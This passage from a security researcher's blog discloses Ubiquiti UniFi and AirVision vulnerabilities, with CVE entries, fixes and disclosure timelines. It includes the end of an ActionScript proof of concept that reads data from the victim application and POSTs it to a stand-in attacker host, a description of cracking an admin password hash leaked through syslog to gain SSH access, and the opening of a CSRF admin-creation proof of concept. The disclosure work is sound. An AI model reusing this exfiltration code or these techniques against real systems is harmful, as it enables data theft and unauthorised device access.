<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var readRequest:URLRequest = new URLRequest(readFrom);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var getLoader:URLLoader = new URLLoader();</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> getLoader.addEventListener(Event.COMPLETE, eventHandler);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> try {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> getLoader.load(readRequest);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> } catch (error:Error) {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> trace("Error loading URL: " + error);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<br />
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> private function eventHandler(event:Event):void {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> // URL to which retrieved data is to be sent</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var sendTo:String = "</span><a href="http://www.malicious-site.com/admin" style="text-decoration: none;"><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.malicious-site.com/admin</span></a><span style="background-color: white; color: #555555; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">"</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var sendRequest:URLRequest = new URLRequest(sendTo);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> sendRequest.method = URLRequestMethod.POST;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> sendRequest.data = event.target.data;</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> var sendLoader:URLLoader = new URLLoader();</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> try {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> sendLoader.load(sendRequest);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> } catch (error:Error) {</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> trace("Error loading URL: " + error);</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">}</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Solution:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater </span><span style="font-family: Arial; font-size: 13px; line-height: 1.15; white-space: pre-wrap;">(Note: The application name changed from AirVision to UniFi Video)</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Disclosure Timeline: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-25: Notified Ubiquiti of crossdomain vulnerability in AirVision product</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-19: Ubiquti confirms receipt of AirVision report and existence of the vulnerability</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-28: </span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CVE-2014-2227 assigned</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-03-12: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-03-27: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-04-07: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-04-09: Ubiquiti provides timeline for solution</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-04-18: UniFi Video 3.0.1 is released</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-06-13: Set public disclosure date of 2014-07-24</span></div>
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-07-24: Public disclosure</span></div>
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-70066228516421905402014-07-23T23:38:00.000-04:002014-07-23T23:38:07.327-04:00CVE-2014-2226<span style="color: #4474a0; font-family: Calibri; font-size: 21px; line-height: 1.0791666666666666; white-space: pre-wrap;">Ubiquiti - UniFi Controller - </span><span style="color: #4474a0; font-family: Calibri; font-size: 21px; line-height: 1.0791666666666666; white-space: pre-wrap;">Admin/root password hash sent via syslog</span><br />
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">CWE-310: </span><a href="http://cwe.mitre.org/data/definitions/310.html" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://cwe.mitre.org/data/definitions/310.html</span></a></div>
<br />
<b style="font-family: Calibri; font-size: 15px; line-height: 15px; white-space: pre-wrap;"><u>Misuse case:</u></b><span style="font-family: Calibri; font-size: 15px; line-height: 15px; white-space: pre-wrap;"> </span><br />
<br />
<span style="font-family: Calibri;"><span style="font-size: 15px; line-height: 1; white-space: pre-wrap;">An attacker who has access to network traffic between the UniFi controller and the configured syslog server, can </span><span style="font-size: 15px; line-height: 15px; white-space: pre-wrap;">retrieve </span><span style="font-size: 15px; line-height: 15px; white-space: pre-wrap;">the</span><span style="font-size: 15px; line-height: 1; white-space: pre-wrap;"> password hash and use it to access all managed access points, and potentially the UniFi controller as well. </span></span><br />
<span style="font-family: Calibri;"><span style="font-size: 15px; line-height: 1; white-space: pre-wrap;"><br /></span></span>
<span style="font-family: Calibri;"><span style="font-size: 15px; line-height: 1; white-space: pre-wrap;"><b><u>Details:</u></b> </span></span><br />
<span style="font-family: Calibri;"><span style="font-size: 15px; line-height: 1; white-space: pre-wrap;"><br /></span></span>
<span style="font-family: Calibri; font-size: 15px; line-height: 15px; white-space: pre-wrap;">If remote logging is enabled on the UniFi controller, the controller sends syslog messages to the configured syslog server. Contained within the syslog messages is the admin password hash that is used by both the UniFi controller, and all managed Access Points.</span><br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Calibri;"><span style="font-size: 15px; line-height: 15px; white-space: pre-wrap;">In the screenshot below, the auth key and the encrypted password are highlighted in yellow. </span></span><br />
<span style="font-family: Calibri;"><span style="font-size: 15px; line-height: 15px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: Calibri; font-size: 15px; margin-left: 1em; margin-right: 1em; vertical-align: baseline; white-space: pre-wrap;"><img height="122px;" src="https://lh4.googleusercontent.com/0mbDkx7JP6QtDKphoCV8GUyOmvXsF727etC4W-ONes_XLUwRgOZ8z4TwYAdFUYAmWgJkgSe19uzavb6aoa2GlB-nv0iQHb4zFMjvUTd-G4iDQEVlxvxXenQyEvzC6TSnHZAXp3NgHl4" style="-webkit-transform: rotate(0rad); border: none;" width="624px;" /></span></div>
</div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; line-height: 1; white-space: pre-wrap;">The password is encrypted using the legacy crypt(1) utility, which uses Traditional DES [128/128 BS SSE2], and can be recovered using John the Ripper:</span><br />
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="146px;" src="https://lh6.googleusercontent.com/F0H0WOrZ_DRZNbIT1kvkYDCSoAxG5T2WX0a1YFcXh8DVb3lOnIuAhtY9D-wZf0jBGjp5gMC5cpJf96IW6Fs2Bhg8fnWXaf8DlU0Gkd9zBRWjg1kxeoK09ngpRjKBX5UlFci68KmBmos" style="-webkit-transform: rotate(0rad); border: none;" width="617px;" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Note: The salt (and hash) changes each time the message is sent, but the password can always be recovered.</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Once you crack the password, you can log into any of the managed access points via SSH. This is actually the format of the password that is used by BusyBox: </span><br />
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="32px;" src="https://lh3.googleusercontent.com/1c5ZYUnNthS6UuX9kVTKh8WU-SSss6SjT8sJ5ZQiLDMHUXxDxkBv5t9fMr86n-cjGWOfzR8pQiRt8dlsA6VMBEo6acsMSVZICZlT-S5i99ed41raNUqYgOLXh_znLJW2Nx0tlh8Gnms" style="-webkit-transform: rotate(0rad); border: none;" width="508px;" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The CVE was assigned as there is no utility (reason) for sending the admin password via syslog messages. </span></div>
<div>
<br />
Additional details:</div>
<div dir="ltr" style="margin-left: 0pt;">
<br /></div>
<div dir="ltr" style="margin-left: 0pt;">
<span id="docs-internal-guid-94cb325f-655d-0ba2-9f85-584657caad66"></span><br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-94cb325f-655d-0ba2-9f85-584657caad66"><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">(CVE-2014-2226) - </span><span style="font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Ubiquiti Networks - UniFi Controller - Admin/root password hash sent via syslog</span></span></div>
<span id="docs-internal-guid-94cb325f-655d-0ba2-9f85-584657caad66">
</span><br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-94cb325f-655d-0ba2-9f85-584657caad66"><span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------</span></span></div>
<span id="docs-internal-guid-94cb325f-655d-0ba2-9f85-584657caad66">
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Vendor: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Ubiquiti Networks (http://www.ubnt.com/)</span></div>
<br /><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">----------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Affected Products/Versions: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">----------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">UniFi Controller v2.4.6</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Note: Previous versions may be affected</span></div>
<br /><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Description:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Title: Admin/</span><span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Root password hash sent in syslog messages</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CVE: CVE-2014-2226</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CWE: CWE-319: http://cwe.mitre.org/data/definitions/319.html</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Researcher: Seth Art - @sethsec</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Detailed writeup (includes screenshots): </span><a href="http://sethsec.blogspot.com/2014/07/cve-2014-2226.html" style="text-decoration: none;"><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://sethsec.blogspot.com/2014/07/cve-2014-2226.html</span></a><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<br /><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">If remote logging is enabled on the UniFi controller, syslog messages are sent to a syslog server. Contained within the syslog messages is the admin password that is used by both the UniFi controller, and all managed Access Points. This CVE was assigned as there is no utility for sending the admin password hash via syslog messages. </span></div>
<br /><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">POC:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Not Applicable. </span></div>
<br /><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Solution:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater</span></div>
<br /><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Disclosure Timeline: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-16: Notified Ubiquiti of vulnerabilities in UniFi and mFi products</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-17: Ubiquiti acknowledges and requests details</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-17: Report with POC sent to Ubiquiti</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-19: Asks Ubiquiti to confirm receipt of report</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-19: Ubiquti confirms receipt of report and existence of the vulnerabilities</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-28: </span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CVE-2014-2226 assigned</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-03-12: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-03-27: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-04-07: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-04-09: Ubiquiti provides timeline for solution</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-05-30: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-06-12: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-06-12: UniFi 3.2.1 is released</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-06-13: Set public disclosure date of 2014-07-24</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-07-24: Public disclosure</span></div>
</span></div>
<div dir="ltr" style="margin-left: 0pt;">
<br /></div>
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-22574543550965345572014-07-23T23:35:00.001-04:002014-08-26T23:19:35.379-04:00CVE-2014-2225<span style="font-family: inherit;">This CVE covers three separate Ubiquiti Networks applications that are all vulnerable to CSRF:</span><br />
<ul>
<li><span style="font-family: inherit;">UniFi Controller</span></li>
<li><span style="font-family: inherit;">mFi Controller</span></li>
<li><span style="font-family: inherit;">AirVision Controller</span></li>
</ul>
<div>
<h1 dir="ltr" style="line-height: 1.0791; margin-bottom: 0pt; margin-top: 12pt;">
<span style="color: #4474a0; font-family: Calibri; font-size: 21px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="line-height: 1.0791;">Ubiquiti - UniFi Controller v2.4.6 - </span>Cross-site Request Forgery (CSRF)</span></h1>
</div>
<div>
<br /></div>
<div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">CWE-352: </span><a href="http://cwe.mitre.org/data/definitions/352.html" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://cwe.mitre.org/data/definitions/352.html</span></a></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The UniFi application is vulnerable to CSRF in multiple locations. The CWE link above has a great summary of the vulnerability. In the POC below, I demonstrate how an unauthenticated attacker can send a malicious hyperlink to an authenticated administrator, and how if the administrator clicks on the link, the attacker can force the authenticated administrator to perform quite a few actions without knowing it. The most serious POC involves the attacker causing the administrator to create a second administrator account. The attacker can now log into the Unifi controller with this second account (if they have network access to the Unifi controller), and perform any actions that an administrator can make. </span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><b>CSRF POC #1– Add Admin</b></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
